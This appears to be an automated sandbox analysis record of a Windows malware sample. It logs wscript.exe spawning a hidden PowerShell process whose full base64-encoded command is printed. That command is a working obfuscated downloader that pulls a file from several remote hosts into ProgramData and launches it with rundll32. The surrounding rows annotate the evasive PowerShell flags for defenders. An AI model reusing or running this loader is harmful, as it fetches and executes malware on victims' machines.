parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAHMARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuAG8AbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMwAxADkAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA==" | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Pzbrjg.js" ApetalousnessTheriomorph Anisoin MultimetallicSemiweekly labionasalBeshell | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Pzbrjg.js" ApetalousnessTheriomorph Anisoin MultimetallicSemiweekly labionasalBeshell |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |